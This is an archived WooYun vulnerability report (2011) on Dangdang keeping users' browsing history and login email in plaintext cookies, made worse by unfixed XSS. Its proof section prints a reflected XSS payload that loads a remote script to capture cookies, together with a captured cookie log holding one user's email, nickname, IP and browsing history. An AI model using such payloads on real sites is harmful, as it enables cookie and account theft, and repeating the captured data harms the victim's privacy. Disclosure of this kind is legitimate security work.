当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2011-01310

漏洞标题:当当网用户隐私泄露漏洞

相关厂商:当当网

漏洞作者: 路人甲

提交时间:2011-02-13 17:27

修复时间:2011-03-15 18:00

公开时间:2011-03-15 18:00

漏洞类型:设计缺陷/逻辑错误

危害等级:中

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2011-02-13: 积极联系厂商并且等待厂商认领中,细节不对外公开
2011-03-15: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

当当网在设计存储用户行为的时候存在问题,导致可能泄露包括用户浏览记录,用户私有Email在内的种种隐私数据

详细说明:

当当网使用Cookie存储用户在当当的搜索记录,浏览记录,用户的登陆Email也存储在Cookie当中,但是却缺乏对这些敏感数据的适当保护,完全是以明文的方式存储,一旦Cookie发生问题就会导致这些数据向第三方公开,加上当当在web安全客户端安全上做得并不理想,发生过很多xss问题而且没有修复,导致这种情况可能更为严重。

漏洞证明:

http://www.wooyun.org/search.php?q=dangdang


使用搜索的xss尝试攻击可以得到用户的数据如下

Time:2010-12-07 12:08:49||Cookie:__permanent_id=20100209004038490714302981532110133; __new_p_id=1; __ozlvd=1291646899; producthistoryname=%B5%CD%D2%F4%CC%E1%C7%D9%2C%CB%CD%B2%CB%C9%FD%BD%B5%BB%FA%A3%A8%C6%B7%CC%D8%CF%B7%BE%E7%A3%A9%2C%BD%A8%D6%FE%B5%C4%B8%B4%D4%D3%D0%D4%D3%EB%C3%AC%B6%DC%D0%D4%2F%BE%AD%B5%E4%BD%A8%D6%FE%C0%ED%C2%DB%B4%D4%CA%E9%2C%B9%FD%D3%DA%D0%FA%CF%F9%B5%C4%B9%C2%B6%C0%A3%BA%B5%D7%B2%E3%B5%C4%D5%E4%D6%E9%2CThe Heart is a Lonely Hunter %D0%C4%CA%C7%B9%C2%B6%C0%B5%C4%C1%D4%CA%D6%2C%BD%F8%BB%AF%D0%C4%C0%ED%D1%A7%2C%CD%F8%C2%E7%D0%D0%CE%AA%D0%C4%C0%ED%D1%A7%A1%AA%A1%AA%D0%E9%C4%E2%CA%C0%BD%E7%D3%EB%D5%E6%CA%B5%C9%FA%BB%EE%2C%CD%F8%C2%E7%B0%AE%C7%E9%A1%AA%A1%AA%D4%DA%CF%DF%B9%D8%CF%B5%D0%C4%C0%ED%D1%A7%2C%C3%F7%C8%D5%B5%C4%CC%EF%D4%B0%B3%C7%CA%D0%2C%B3%C7%CA%D0%D2%E2%CF%F3  %B3%C7%CA%D0%BD%A8%D6%FE%CE%C4%BB%AF%CF%B5%C1%D0; producthistoryid=9179798%2C20921268%2C9136409%2C708069%2C20887312%2C9332574%2C20947316%2C20874582%2C129613%2C31569; cart_id=1003161806227177; dangdang.com=email=c2hpcmxleWJobU25YWhvb25jb20uY24=&nickname=tP22t8Lt&display_id=5073092796191&customerid=0ak t SDNKU=&viptype=wY 2X/CBzQ0=&show_name=%u5927%u5934%u9A6C; email=xhirxxxyxxhm%40yahoo.com.cn; nickname=%C4%E3%B4%F3%D2%AF; validatedflag=0; __utma=263274265.1997209953.1279971541.1289879301.1291646900.5; __utmz=263274265.1289879301.4.4.utmcsr=search.dangdang.com|utmccn=(referral)|utmcmd=referral|utmcct=/search.php; __unam=505b174-12b4ecbf387-2a8ea275-1; cart_db_index=1; cart_items_count=0; ck_db_index=0; is_new=1; HK=%25BD%25A8%25D6%25FE%25B5%25C4%25D3%25C0%25BA%25E3%25D6%25AE%25B5%25C0%3B%25BD%25F8%25BB%25AF%25D0%25C4%25C0%25ED%25D1%25A7%3B%253Cscript%252Fsrc%253D%2527http%253A%252F%252Fwww.wooyun.orgxss.js%253F%2527%253E%253A%252Fscript%253E; from=419-69181%7Cdd; order_follow_source=P-419-6918%7C%231%7C%23www.verycd.com%252Ftopics%252F2866822%252F%7C%230-%7C-; out_order_source=P-419-6918%7C%231%7C%23www.verycd.com%252Ftopics%252F2866822%252F%7C%230||URL:http://search.dangdang.com/search.php?key=<script/src=\'http://www.wooyun.org/xss.js?\'></script>||User-Agent:Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12||Refer:http://search.dangdang.com/search.php?key=%3Cscript/src=%27http%3A//www.wooyun.org/xss.js?%27%3e%3c/script%3e||IP:60.168.72.208


其中包含有浏览记录和email在内的种种敏感信息

修复方案:

对用户的数据存储加以安全设计并且修复众多xss漏洞

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)